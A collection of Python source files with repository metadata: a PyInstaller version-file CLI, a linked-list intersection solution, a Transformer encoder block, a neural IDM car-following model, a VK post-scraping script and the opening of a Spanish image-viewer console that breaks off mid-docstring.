a2f71ad4e5619ec0c9fbad726d9b050a60b5356a | 917 | py | Python | pythonProject1/venv/Lib/site-packages/pyinstaller_versionfile/__main__.py | mjtomlinson/CNE330_Python_1_Final_Project | 05020806860937ef37b9a0ad2e27de4897a606de | [
"CC0-1.0"
] | 15 | 2020-10-01T19:36:13.000Z | 2022-03-17T11:11:39.000Z | pythonProject1/venv/Lib/site-packages/pyinstaller_versionfile/__main__.py | mjtomlinson/CNE330_Python_1_Final_Project | 05020806860937ef37b9a0ad2e27de4897a606de | [
"CC0-1.0"
] | 7 | 2020-09-25T17:47:45.000Z | 2021-08-07T15:33:55.000Z | pythonProject1/venv/Lib/site-packages/pyinstaller_versionfile/__main__.py | mjtomlinson/CNE330_Python_1_Final_Project | 05020806860937ef37b9a0ad2e27de4897a606de | [
"CC0-1.0"
] | null | null | null | """
Main file for pyinstaller-versionfile, which is the entrypoint for the command line script.
"""
import argparse
import pyinstaller_versionfile
def main(args=None):
args = args or parse_args(args)
pyinstaller_versionfile.create_versionfile_from_input_file(
output_file=args.outfile,
input_file=args.metadata_file,
version=args.version
)
def parse_args(args):
parser = argparse.ArgumentParser(description="Create a version file for PyInstaller from a YAML metadata file.")
parser.add_argument("metadata_file", help="Path to YAML metadata file")
parser.add_argument("--outfile", default="./version_file.txt", help="Resulting version file for PyInstaller")
parser.add_argument("--version", default=None, help="Override Version information given in metadata file")
return parser.parse_args(args)
if __name__ == '__main__': # pragma: no cover
main()
| 31.62069 | 116 | 0.740458 | 118 | 917 | 5.542373 | 0.415254 | 0.091743 | 0.082569 | 0.076453 | 0.100917 | 0.100917 | 0 | 0 | 0 | 0 | 0 | 0 | 0.161396 | 917 | 28 | 117 | 32.75 | 0.850455 | 0.118866 | 0 | 0 | 0 | 0 | 0.295 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.117647 | 0 | 0.294118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2f762a7e68d5cf3b05bf0178feec36718bd6cf2 | 1,161 | py | Python | 160/intersectionoftwolinkedlist.py | cccccccccccccc/Myleetcode | fb3fa6df7c77feb2d252feea7f3507569e057c70 | [
"Apache-2.0"
] | null | null | null | 160/intersectionoftwolinkedlist.py | cccccccccccccc/Myleetcode | fb3fa6df7c77feb2d252feea7f3507569e057c70 | [
"Apache-2.0"
] | null | null | null | 160/intersectionoftwolinkedlist.py | cccccccccccccc/Myleetcode | fb3fa6df7c77feb2d252feea7f3507569e057c70 | [
"Apache-2.0"
] | null | null | null | # Definition for singly-linked list.
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution:
def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:
if headA == headB:
return headA
lengthA = 0
tmpA = headA
while tmpA:
tmpA = tmpA.next
lengthA +=1
lengthB = 0
tmpB = headB
while tmpB:
tmpB = tmpB.next
lengthB +=1
l = headA
r = headB
if lengthA>lengthB:
m = lengthA-lengthB
for _ in range(m):
l = l.next
elif lengthA<lengthB:
n = lengthB-lengthA
for _ in range(n):
r = r.next
while l:
if l != r:
l = l.next
r = r.next
else:
break
return l
A = Solution()
a = ListNode(4)
b = ListNode(1)
c = ListNode(5)
d = ListNode(6)
e = ListNode(1)
f = ListNode(8)
g = ListNode(4)
a.next = b
b.next = f
c.next = d
d.next = e
e.next = f
f.next = g
print(A.getIntersectionNode(a,c)) | 22.326923 | 80 | 0.48062 | 145 | 1,161 | 3.806897 | 0.331034 | 0.076087 | 0.036232 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016467 | 0.424634 | 1,161 | 52 | 81 | 22.326923 | 0.80988 | 0.029285 | 0 | 0.08 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04 | false | 0 | 0 | 0 | 0.12 | 0.02 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
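A common O(1)-extra-space alternative to the length-difference approach above: two pointers that jump to the other list's head when they run off the end each travel at most lengthA + lengthB steps, so they meet at the intersection node (or both reach None together). A sketch reusing the ListNode class and nodes from this snippet:

def get_intersection_two_pointers(headA: ListNode, headB: ListNode) -> ListNode:
    p, q = headA, headB
    while p is not q:
        p = p.next if p else headB
        q = q.next if q else headA
    return p

print(get_intersection_two_pointers(a, c).val)  # 8, the first shared node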
a2f85797b6e8f01802b839c8fc0e11137d0f7f2c | 5,390 | py | Python | neural_sp/models/seq2seq/encoders/transformer_block.py | vpellegrain/neural_sp | 1daa40a8f7553f5648ead572546e92ed5fef2b4c | [
"Apache-2.0"
] | 2 | 2021-01-25T02:55:09.000Z | 2021-02-05T03:47:05.000Z | neural_sp/models/seq2seq/encoders/transformer_block.py | vpellegrain/neural_sp | 1daa40a8f7553f5648ead572546e92ed5fef2b4c | [
"Apache-2.0"
] | null | null | null | neural_sp/models/seq2seq/encoders/transformer_block.py | vpellegrain/neural_sp | 1daa40a8f7553f5648ead572546e92ed5fef2b4c | [
"Apache-2.0"
] | 1 | 2021-02-28T05:59:29.000Z | 2021-02-28T05:59:29.000Z | # Copyright 2020 Kyoto University (Hirofumi Inaguma)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""Transformer encoder block."""
import logging
import random
import torch
import torch.nn as nn
from neural_sp.models.modules.multihead_attention import MultiheadAttentionMechanism as MHA
from neural_sp.models.modules.positionwise_feed_forward import PositionwiseFeedForward as FFN
from neural_sp.models.modules.relative_multihead_attention import RelativeMultiheadAttentionMechanism as RelMHA
random.seed(1)
logger = logging.getLogger(__name__)
class TransformerEncoderBlock(nn.Module):
"""A single layer of the Transformer encoder.
Args:
d_model (int): input dimension of MultiheadAttentionMechanism and PositionwiseFeedForward
d_ff (int): hidden dimension of PositionwiseFeedForward
n_heads (int): number of heads for multi-head attention
dropout (float): dropout probabilities for linear layers
dropout_att (float): dropout probabilities for attention distributions
dropout_layer (float): LayerDrop probability
layer_norm_eps (float): epsilon parameter for layer normalization
        ffn_activation (str): nonlinear function for PositionwiseFeedForward
param_init (str): parameter initialization method
pe_type (str): type of positional encoding
clamp_len (int): maximum relative distance from each position
ffn_bottleneck_dim (int): bottleneck dimension for the light-weight FFN layer
"""
def __init__(self, d_model, d_ff, n_heads,
dropout, dropout_att, dropout_layer,
layer_norm_eps, ffn_activation, param_init,
pe_type, clamp_len, ffn_bottleneck_dim):
super(TransformerEncoderBlock, self).__init__()
self.n_heads = n_heads
        self.rel_attn = pe_type in ['relative', 'relative_xl']
# self-attention
self.norm1 = nn.LayerNorm(d_model, eps=layer_norm_eps)
mha = RelMHA if self.rel_attn else MHA
self.self_attn = mha(kdim=d_model,
qdim=d_model,
adim=d_model,
odim=d_model,
n_heads=n_heads,
dropout=dropout_att,
param_init=param_init,
xl_like=pe_type == 'relative_xl',
clamp_len=clamp_len)
# position-wise feed-forward
self.norm2 = nn.LayerNorm(d_model, eps=layer_norm_eps)
self.feed_forward = FFN(d_model, d_ff, dropout, ffn_activation, param_init,
ffn_bottleneck_dim)
self.dropout = nn.Dropout(dropout)
self.dropout_layer = dropout_layer
self.reset_visualization()
@property
def xx_aws(self):
return self._xx_aws
def reset_visualization(self):
self._xx_aws = None
def forward(self, xs, xx_mask=None, cache=None,
pos_embs=None, u_bias=None, v_bias=None):
"""Transformer encoder layer definition.
Args:
xs (FloatTensor): `[B, T (query), d_model]`
xx_mask (ByteTensor): `[B, T (query), T (key)]`
cache (dict):
input_san: `[B, n_hist, d_model]`
output: `[B, n_hist, d_model]`
pos_embs (LongTensor): `[T (query), 1, d_model]`
u_bias (FloatTensor): global parameter for relative positional encoding
v_bias (FloatTensor): global parameter for relative positional encoding
Returns:
xs (FloatTensor): `[B, T (query), d_model]`
new_cache (dict):
input_san: `[B, n_hist+T, d_model]`
output: `[B, T (query), d_model]`
"""
self.reset_visualization()
new_cache = {}
qlen = xs.size(1)
# LayerDrop
if self.dropout_layer > 0:
if self.training and random.random() < self.dropout_layer:
return xs, new_cache
else:
xs = xs / (1 - self.dropout_layer)
##################################################
# self-attention
##################################################
residual = xs # `[B, qlen, d_model]`
xs = self.norm1(xs) # pre-norm
# cache
if cache is not None:
xs = torch.cat([cache['input_san'], xs], dim=1)
new_cache['input_san'] = xs
xs_kv = xs
if cache is not None:
xs = xs[:, -qlen:]
residual = residual[:, -qlen:] # `[B, qlen, d_model]`
xx_mask = xx_mask[:, -qlen:]
if self.rel_attn:
xs, self._xx_aws = self.self_attn(xs_kv, xs, pos_embs, xx_mask, u_bias, v_bias) # k/q/m
else:
xs, self._xx_aws = self.self_attn(xs_kv, xs_kv, xs, mask=xx_mask)[:2] # k/v/q
# assert xs.size() == residual.size()
xs = self.dropout(xs) + residual
##################################################
# position-wise feed-forward
##################################################
residual = xs # `[B, qlen, d_model]`
xs = self.norm2(xs) # pre-norm
xs = self.feed_forward(xs)
xs = self.dropout(xs) + residual
new_cache['output'] = xs
return xs, new_cache
| 37.430556 | 111 | 0.575139 | 629 | 5,390 | 4.701113 | 0.263911 | 0.038553 | 0.016233 | 0.018262 | 0.211701 | 0.144741 | 0.132567 | 0.099425 | 0.019614 | 0.019614 | 0 | 0.005022 | 0.298145 | 5,390 | 143 | 112 | 37.692308 | 0.776632 | 0.337848 | 0 | 0.171429 | 0 | 0 | 0.016783 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057143 | false | 0 | 0.1 | 0.014286 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
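A tiny standalone sketch of the pre-norm residual pattern this block applies twice (once around self-attention, once around the feed-forward network): y = x + Dropout(Sublayer(LayerNorm(x))). The sublayer here is just a Linear stand-in:

import torch
import torch.nn as nn

class PreNormResidual(nn.Module):
    def __init__(self, d_model, sublayer, dropout=0.1, eps=1e-12):
        super().__init__()
        self.norm = nn.LayerNorm(d_model, eps=eps)
        self.sublayer = sublayer
        self.dropout = nn.Dropout(dropout)

    def forward(self, x):
        return x + self.dropout(self.sublayer(self.norm(x)))

block = PreNormResidual(256, nn.Linear(256, 256))
print(block(torch.randn(2, 50, 256)).shape)  # torch.Size([2, 50, 256])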
a2f8823364ceabac4d77a08f5b8e4048e81d7f80 | 14,490 | py | Python | src/models/core/neural_idm.py | saArbabi/sim | cc6fd2d71c3621f47616e830db83244e51d28a28 | [
"MIT"
] | 1 | 2021-03-26T15:28:31.000Z | 2021-03-26T15:28:31.000Z | src/models/core/neural_idm.py | saArbabi/sim | cc6fd2d71c3621f47616e830db83244e51d28a28 | [
"MIT"
] | null | null | null | src/models/core/neural_idm.py | saArbabi/sim | cc6fd2d71c3621f47616e830db83244e51d28a28 | [
"MIT"
] | null | null | null |
from tensorflow.keras.layers import Dense, LSTM, Bidirectional, TimeDistributed, LeakyReLU
from keras import backend as K
from importlib import reload
from models.core import abstract_model
reload(abstract_model)
from models.core.abstract_model import AbstractModel
import tensorflow as tf
import tensorflow_probability as tfp
tfd = tfp.distributions
class NeurIDMModel(AbstractModel):
def __init__(self, config):
super(NeurIDMModel, self).__init__(config)
self.f_seq_encoder = FutureEncoder()
self.h_seq_encoder = HistoryEncoder()
self.belief_net = BeliefModel(config)
self.forward_sim = IDMForwardSim(config)
self.idm_layer = IDMLayer()
self.loss_function = tf.keras.losses.Huber()
self.vae_loss_weight = config['model_config']['vae_loss_weight']
# self.loss_function = tf.keras.losses.MeanAbsoluteError()
# self.loss_function = tf.keras.losses.MeanSquaredError()
def callback_def(self):
self.train_mseloss = tf.keras.metrics.Mean()
self.test_mseloss = tf.keras.metrics.Mean()
self.train_klloss = tf.keras.metrics.Mean()
self.test_klloss = tf.keras.metrics.Mean()
def mse(self, act_true, act_pred):
act_true = (act_true)/0.1
act_pred = (act_pred)/0.1
loss = self.loss_function(act_true, act_pred)
tf.debugging.check_numerics(loss, message='Checking loss')
return loss
def kl_loss(self, pri_params, pos_params):
pri_mean, pri_logsigma = pri_params
pos_mean, pos_logsigma = pos_params
prior = tfd.Normal(loc=pri_mean, scale=tf.exp(pri_logsigma))
posterior = tfd.Normal(loc=pos_mean, scale=tf.exp(pos_logsigma))
return tf.reduce_mean(tfp.distributions.kl_divergence(posterior, prior))
def train_loop(self, data_objs):
# tf.print('######## TRAIN #######:')
train_ds = self.batch_data(data_objs)
for history_sca, future_sca, future_idm_s, future_m_veh_c, future_ego_a in train_ds:
self.train_step([history_sca, future_sca, future_idm_s, future_m_veh_c], future_ego_a)
def test_loop(self, data_objs):
train_ds = self.batch_data(data_objs)
for history_sca, future_sca, future_idm_s, future_m_veh_c, future_ego_a in train_ds:
self.test_step([history_sca, future_sca, future_idm_s, future_m_veh_c], future_ego_a)
@tf.function(experimental_relax_shapes=True)
def train_step(self, states, targets):
with tf.GradientTape() as tape:
act_pred, pri_params, pos_params = self(states)
mse_loss = self.mse(targets, act_pred)
kl_loss = self.kl_loss(pri_params, pos_params)
loss = self.vae_loss(mse_loss, kl_loss)
gradients = tape.gradient(loss, self.trainable_variables)
self.optimizer.apply_gradients(zip(gradients, self.trainable_variables))
self.train_mseloss.reset_states()
self.train_klloss.reset_states()
self.train_mseloss(mse_loss)
self.train_klloss(kl_loss)
@tf.function(experimental_relax_shapes=True)
def test_step(self, states, targets):
act_pred, pri_params, pos_params = self(states)
mse_loss = self.mse(targets, act_pred)
kl_loss = self.kl_loss(pri_params, pos_params)
loss = self.vae_loss(mse_loss, kl_loss)
self.test_mseloss.reset_states()
self.test_klloss.reset_states()
self.test_mseloss(mse_loss)
self.test_klloss(kl_loss)
def vae_loss(self, mse_loss, kl_loss):
return self.vae_loss_weight*kl_loss + mse_loss
def call(self, inputs):
enc_h = self.h_seq_encoder(inputs[0]) # history
enc_f = self.f_seq_encoder(inputs[1])
pri_params, pos_params = self.belief_net(\
[enc_h, enc_f], dis_type='both')
z_idm, z_att = self.belief_net.sample_z(pos_params)
env_state = inputs[0][:, -1, :]
proj_idm = self.belief_net.z_proj_idm(tf.concat([z_idm, env_state], axis=-1))
proj_att = self.belief_net.z_proj_att(tf.concat([z_att, env_state], axis=-1))
idm_params = self.idm_layer(proj_idm)
act_seq, _ = self.forward_sim.rollout([\
idm_params, proj_att, inputs[2], inputs[-1]])
# tf.print('###############:')
        # tf.print('att_score max: ', tf.reduce_max(att_scores))
        # tf.print('att_score min: ', tf.reduce_min(att_scores))
        # tf.print('att_score mean: ', tf.reduce_mean(att_scores))
return act_seq, pri_params, pos_params
class BeliefModel(tf.keras.Model):
def __init__(self, config):
super(BeliefModel, self).__init__(name="BeliefModel")
self.proj_dim = 64
self.latent_dim = config['model_config']['latent_dim']
self.architecture_def()
def architecture_def(self):
self.pri_mean = Dense(self.latent_dim)
self.pri_logsigma = Dense(self.latent_dim)
self.pos_mean = Dense(self.latent_dim)
self.pos_logsigma = Dense(self.latent_dim)
self.pri_projection = Dense(self.proj_dim, activation=LeakyReLU())
self.pos_projection = Dense(self.proj_dim, activation=LeakyReLU())
####
self.proj_idm_1 = Dense(self.proj_dim, activation=LeakyReLU())
self.proj_idm_2 = Dense(self.proj_dim, activation=LeakyReLU())
self.proj_idm_3 = Dense(self.proj_dim)
self.proj_att_1 = Dense(self.proj_dim, activation=LeakyReLU())
self.proj_att_2 = Dense(self.proj_dim, activation=LeakyReLU())
self.proj_att_3 = Dense(self.proj_dim)
def sample_z(self, dis_params):
z_mean, z_logsigma = dis_params
_epsilon = tf.random.normal(shape=(tf.shape(z_mean)[0],
self.latent_dim), mean=0., stddev=1)
z_sigma = K.exp(z_logsigma)
sampled_z = z_mean + z_sigma*_epsilon
# tf.print('z_min: ', tf.reduce_min(z_sigma))
return sampled_z[:, :3], sampled_z[:, 3:]
def z_proj_idm(self, x):
x = self.proj_idm_1(x)
x = self.proj_idm_2(x)
x = self.proj_idm_3(x)
return x
def z_proj_att(self, x):
x = self.proj_att_1(x)
x = self.proj_att_2(x)
x = self.proj_att_3(x)
return x
def call(self, inputs, dis_type):
if dis_type == 'both':
enc_h, enc_f = inputs
# prior
pri_context = self.pri_projection(enc_h)
pri_mean = self.pri_mean(pri_context)
pri_logsigma = self.pri_logsigma(pri_context)
# posterior
pos_context = self.pos_projection(tf.concat([enc_h, enc_f], axis=-1))
pos_mean = self.pos_mean(pos_context)
pos_logsigma = self.pos_logsigma(pos_context)
pri_params = [pri_mean, pri_logsigma]
pos_params = [pos_mean, pos_logsigma]
return pri_params, pos_params
elif dis_type == 'prior':
pri_context = self.pri_projection(inputs)
pri_mean = self.pri_mean(pri_context)
pri_logsigma = self.pri_logsigma(pri_context)
pri_params = [pri_mean, pri_logsigma]
return pri_params
class HistoryEncoder(tf.keras.Model):
def __init__(self):
super(HistoryEncoder, self).__init__(name="HistoryEncoder")
self.enc_units = 128
self.architecture_def()
def architecture_def(self):
self.lstm_layer = LSTM(self.enc_units)
def call(self, inputs):
enc_h = self.lstm_layer(inputs)
return enc_h
class FutureEncoder(tf.keras.Model):
def __init__(self):
super(FutureEncoder, self).__init__(name="FutureEncoder")
self.enc_units = 128
self.architecture_def()
def architecture_def(self):
self.lstm_layer = Bidirectional(LSTM(self.enc_units), merge_mode='concat')
def call(self, inputs):
enc_acts = self.lstm_layer(inputs)
return enc_acts
class IDMForwardSim(tf.keras.Model):
def __init__(self, config):
super(IDMForwardSim, self).__init__(name="IDMForwardSim")
self.attention_temp = config['model_config']['attention_temp']
self.proj_dim = 64
self.dec_units = 128
self.architecture_def()
def architecture_def(self):
self.lstm_layer = LSTM(self.dec_units, return_sequences=True, return_state=True)
self.res_act_neu = TimeDistributed(Dense(1))
self.att_neu = TimeDistributed(Dense(1))
def idm_driver(self, vel, dv, dx, idm_params):
dx = tf.clip_by_value(dx, clip_value_min=1, clip_value_max=100.)
desired_v = idm_params[:,:,0:1]
desired_tgap = idm_params[:,:,1:2]
min_jamx = idm_params[:,:,2:3]
max_act = idm_params[:,:,3:4]
min_act = idm_params[:,:,4:5]
_gap_denum = 2*tf.sqrt(max_act*min_act)
_gap = desired_tgap*vel+(vel*dv)/_gap_denum
desired_gap = min_jamx + K.relu(_gap)
act = max_act*(1-(vel/desired_v)**4-\
(desired_gap/dx)**2)
# return self.action_clip(act)
return self.action_clip(act)
def action_clip(self, action):
"This is needed to avoid infinities"
return tf.clip_by_value(action, clip_value_min=-6, clip_value_max=6)
def scale_env_s(self, env_state):
env_state = (env_state-self.env_scaler.mean_)/self.env_scaler.var_**0.5
return env_state
def get_att(self, lstm_output):
att_x = self.att_neu(lstm_output)
return 1/(1+tf.exp(-self.attention_temp*att_x))
def handle_merger(self, em_act, dx, m_veh_exists):
"""??
"""
dummy_mul = tf.cast(tf.greater(dx*m_veh_exists, 0), tf.float32)
random_act = tf.random.normal(shape=(tf.shape(dx)[0], 1, 1), \
mean=0., stddev=0.1)
return em_act*dummy_mul + (1-dummy_mul)*random_act
def rollout(self, inputs):
idm_params, proj_belief, idm_s, merger_cs = inputs
batch_size = tf.shape(idm_s)[0]
idm_params = tf.reshape(idm_params, [batch_size, 1, 5])
proj_latent = tf.reshape(proj_belief, [batch_size, 1, self.proj_dim])
state_h = state_c = tf.zeros([batch_size, self.dec_units])
for step in range(30):
f_veh_v = idm_s[:, step:step+1, 1:2]
m_veh_v = idm_s[:, step:step+1, 2:3]
f_veh_glob_x = idm_s[:, step:step+1, 4:5]
m_veh_glob_x = idm_s[:, step:step+1, 5:6]
em_dv_true = idm_s[:, step:step+1, 8:9]
em_delta_x_true = idm_s[:, step:step+1, 9:10]
# these to deal with missing cars
m_veh_exists = idm_s[:, step:step+1, -1:]
if step == 0:
ego_v = idm_s[:, step:step+1, 0:1]
ego_glob_x = idm_s[:, step:step+1, 3:4]
else:
ego_v += _act*0.1
ego_glob_x += ego_v*0.1 + 0.5*_act*0.1**2
ef_delta_x = (f_veh_glob_x - ego_glob_x)
em_delta_x = (m_veh_glob_x - ego_glob_x)*m_veh_exists+\
(1-m_veh_exists)*self.dummy_value_set['em_delta_x']
ef_dv = (ego_v - f_veh_v)
em_dv = (ego_v - m_veh_v)*m_veh_exists+\
(1-m_veh_exists)*self.dummy_value_set['em_delta_v']
# tf.print('############ ef_act ############')
env_state = tf.concat([ego_v, f_veh_v, \
ef_dv, ef_delta_x, em_dv, em_delta_x], axis=-1)
env_state = self.scale_env_s(env_state)
merger_c = merger_cs[:, step:step+1, :]
lstm_output, state_h, state_c = self.lstm_layer(tf.concat([\
proj_latent, env_state, merger_c], axis=-1), \
initial_state=[state_h, state_c])
att_score = self.get_att(lstm_output)
ef_act = self.idm_driver(ego_v, ef_dv, ef_delta_x, idm_params)
em_act = self.idm_driver(ego_v, em_dv, em_delta_x, idm_params)
em_act = self.handle_merger(em_act, em_delta_x, m_veh_exists)
# att_score = idm_s[:, step:step+1, -3:-2]
_act = (1-att_score)*ef_act + att_score*em_act
if step == 0:
act_seq = _act
att_seq = att_score
else:
act_seq = tf.concat([act_seq, _act], axis=1)
att_seq = tf.concat([att_seq, att_score], axis=1)
# tf.print('att_score: ', tf.reduce_mean(att_seq))
return act_seq, att_seq
class IDMLayer(tf.keras.Model):
def __init__(self):
super(IDMLayer, self).__init__(name="IDMLayer")
self.architecture_def()
def architecture_def(self):
self.des_v_neu = Dense(1)
self.des_tgap_neu = Dense(1)
self.min_jamx_neu = Dense(1)
self.max_act_neu = Dense(1)
self.min_act_neu = Dense(1)
def get_des_v(self, x):
output = self.des_v_neu(x)
minval = 10
maxval = 30
return minval + (maxval-minval)/(1+tf.exp(-1.*output))
def get_des_tgap(self, x):
output = self.des_tgap_neu(x)
minval = 0
maxval = 3
return minval + (maxval-minval)/(1+tf.exp(-1.*output))
def get_min_jamx(self, x):
output = self.min_jamx_neu(x)
minval = 0
maxval = 6
return minval + (maxval-minval)/(1+tf.exp(-1.*output))
def get_max_act(self, x):
output = self.max_act_neu(x)
minval = 1
maxval = 6
return minval + (maxval-minval)/(1+tf.exp(-1.*output))
def get_min_act(self, x):
output = self.min_act_neu(x)
minval = 1
maxval = 6
return minval + (maxval-minval)/(1+tf.exp(-1.*output))
def call(self, x):
desired_v = self.get_des_v(x)
desired_tgap = self.get_des_tgap(x)
min_jamx = self.get_min_jamx(x)
max_act = self.get_max_act(x)
min_act = self.get_min_act(x)
idm_param = tf.concat([desired_v, desired_tgap, min_jamx, max_act, min_act], axis=-1)
return idm_param
| 40.027624 | 99 | 0.601173 | 2,030 | 14,490 | 3.953202 | 0.115764 | 0.022928 | 0.015078 | 0.014953 | 0.428162 | 0.341931 | 0.263551 | 0.216822 | 0.184548 | 0.155389 | 0 | 0.015587 | 0.282747 | 14,490 | 361 | 100 | 40.138504 | 0.756567 | 0.041132 | 0 | 0.216312 | 0 | 0 | 0.016311 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.134752 | false | 0 | 0.024823 | 0.003546 | 0.262411 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
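IDMForwardSim.idm_driver above is a batched TensorFlow graph of the Intelligent Driver Model. A scalar numpy transcription of the same rule (without the TF clipping or batching), handy for sanity-checking parameter values:

import numpy as np

def idm_accel(vel, dv, dx, desired_v, desired_tgap, min_jamx, max_act, min_act):
    # dv = ego speed minus lead speed, dx = gap to the lead vehicle
    gap_term = desired_tgap * vel + (vel * dv) / (2 * np.sqrt(max_act * min_act))
    desired_gap = min_jamx + max(0.0, gap_term)
    return max_act * (1 - (vel / desired_v) ** 4 - (desired_gap / dx) ** 2)

print(idm_accel(vel=15., dv=0., dx=30., desired_v=25.,
                desired_tgap=1.5, min_jamx=2., max_act=1.4, min_act=2.))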
a2f97e2b14d71f15a402efe25816b69f24939597 | 2,540 | py | Python | utils/csv_to_dataset.py | nikitaardashev/Vk-BD-ML | 40d52e944a56b8bcb588ce0c79755cdb9c050018 | [
"MIT"
] | 2 | 2021-01-14T20:47:43.000Z | 2021-01-27T05:46:56.000Z | utils/csv_to_dataset.py | nikitaardashev/Vk-BD-ML | 40d52e944a56b8bcb588ce0c79755cdb9c050018 | [
"MIT"
] | null | null | null | utils/csv_to_dataset.py | nikitaardashev/Vk-BD-ML | 40d52e944a56b8bcb588ce0c79755cdb9c050018 | [
"MIT"
] | 1 | 2021-01-27T05:48:54.000Z | 2021-01-27T05:48:54.000Z | import requests
import csv
import os
import shutil
from time import time
key = ''
count = 1  # Number of posts to fetch from each wall
def get_posts(owner_id, count, key):
global error
owner_id = -abs(int(owner_id))
try:
res = requests.get('https://api.vk.com/method/wall.get', {
'access_token': key,
'owner_id': owner_id,
'v': 5.126,
'count': count
}, timeout=1).json()
if "error" in res:
print(f'\r{res["error"]["error_msg"]} (owner_id: {owner_id}){" " * 20}')
error += 1
if res["error"]["error_code"] == 29:
exit(res["error"]["error_code"])
else:
return []
return res["response"]["items"]
except requests.exceptions.ReadTimeout:
error += 1
return []
error = 0
try:
shutil.rmtree("dataset")
except FileNotFoundError:
pass
os.mkdir("dataset")
os.mkdir("dataset/train")
os.mkdir("dataset/test")
try:
with open('obrazovanie_2.csv', 'r', encoding='utf-8-sig') as f:
line_total = sum(1 for row in f)
line_count = 0
with open('obrazovanie_2.csv', 'r', encoding='utf-8-sig') as csv_file:
reader = csv.reader(csv_file, delimiter=';')
written = {}
print("==================\nDownoading data...")
print("0% ", end='')
start_time = time()
for owner_id, domain, label in reader:
label = label.lower()
if label not in written:
written[label] = 0
os.mkdir(f'dataset/train/{label}')
for post in get_posts(owner_id, count, key):
if not post["marked_as_ads"]:
fname = f'dataset/train/{label}/post_{written[label]}.txt'
with open(fname, 'w') as f:
f.write(post["text"])
written[label] += 1
line_count += 1
percent = round((line_count / line_total) * 100, 2)
time_left = (time() - start_time) / percent * 100
print(f"\r[{('#' * (int(percent) // 10)).ljust(10, ' ')}] "
f"{percent}% ({int(time_left) // 60}m left) "
f"(Errors: {error}) "
f"({line_count}/{line_total})",
end='')
print(f'\r=================={" " * 50}')
print(f"Successfully loaded {line_count - error} of {line_total} "
f"(Errors: {error})")
except FileNotFoundError:
print("csv not found")
| 29.882353 | 84 | 0.506299 | 303 | 2,540 | 4.128713 | 0.369637 | 0.05036 | 0.016787 | 0.023981 | 0.102318 | 0.102318 | 0.065548 | 0.065548 | 0.065548 | 0.065548 | 0 | 0.022261 | 0.327953 | 2,540 | 84 | 85 | 30.238095 | 0.710603 | 0.012598 | 0 | 0.128571 | 0 | 0 | 0.257382 | 0.070231 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014286 | false | 0.014286 | 0.071429 | 0 | 0.128571 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
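A hypothetical retry wrapper around get_posts() above: timeouts and API errors both surface as an empty list, so a short pause and retry is often all that is needed. The alias avoids clashing with the script's "from time import time" binding:

import time as time_module

def get_posts_with_retry(owner_id, count, key, attempts=3, delay=0.4):
    # NB: a genuinely empty wall also returns [], so it gets retried too
    for _ in range(attempts):
        posts = get_posts(owner_id, count, key)
        if posts:
            return posts
        time_module.sleep(delay)
    return []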
a2facf988b0820dc925e55e9acf9afe7c74e8e86 | 2,920 | py | Python | image_transformation/consola_visor_imagenes.py | alxus27/PythonForCats | 7a082fd0f21e77b876bc8afea74e5264758e27ac | [
"MIT"
] | 4 | 2020-05-12T18:34:13.000Z | 2020-07-17T01:05:08.000Z | image_transformation/consola_visor_imagenes.py | alxus27/PythonForCats | 7a082fd0f21e77b876bc8afea74e5264758e27ac | [
"MIT"
] | 2 | 2020-06-05T23:33:53.000Z | 2020-06-05T23:48:11.000Z | image_transformation/consola_visor_imagenes.py | alxus27/PythonForCats | 7a082fd0f21e77b876bc8afea74e5264758e27ac | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Level 4 example: Image viewer
Topics:
* Matrices
@author: zejiran
"""
import visor_imagenes
def imprimir_menu_principal():
    # Print the items of the application's main menu.
print("\nVisor de imágenes\n")
print("(1) Cargar imagen")
print("(2) Negativo")
print("(3) Reflejar")
print("(4) Binarizar")
print("(5) Escala de grises")
print("(6) Convolución")
print("(7) Salir")
def cargar_imagen() -> list:
    # Show the options for loading an image and load the image selected by the user.
ruta = input("Ingrese el nombre del archivo que contiene la imagen: ")
image = visor_imagenes.cargar_imagen(ruta)
visor_imagenes.visualizar_imagen(image)
return image
def ejecutar_binarizar_imagen(image: list) -> list:
""" Pide al usuario el umbral deseado y binariza la imagen recibida por parámetro.
Parámetros:
imagen (list) Matriz (M,N,3) con la imagen a binarizar.
"""
